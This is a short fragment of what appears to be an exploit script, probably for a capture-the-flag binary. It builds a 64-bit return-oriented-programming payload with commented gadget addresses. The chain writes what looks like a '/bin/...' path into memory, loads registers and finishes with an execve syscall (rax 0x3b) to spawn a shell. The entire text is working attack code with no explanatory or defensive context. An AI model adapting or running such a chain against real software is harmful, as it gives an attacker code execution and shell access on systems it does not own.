payload = p64(0x4020e5)
#0x00000000004020e5: pop rbx; pop rbp; ret; 
payload += p64(0x76000032)+p64(0x40f1be)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4020e5)
# 0x00000000004020e5: pop rbx; pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x40f0ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4020e5)
# 0x00000000004020e5: pop rbx; pop rbp; ret; 
payload += p64(0x68662f)+p64(0x40f0b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x406c95)
# 0x0000000000406c95: mov edx, 0x89ffffce; ret; 
payload += p64(0x4099c7)
# 0x00000000004099c7: pop rax; ret; 
payload += p64(0x36b0ef96)+p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x40f070)+p64(0x403818)
# 0x0000000000403818: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4099c7)
# 0x00000000004099c7: pop rax; ret; 
payload += p64(0x3b)+p64(0x402ff0)
# 0x0000000000402ff0: syscall; 
payload += b''
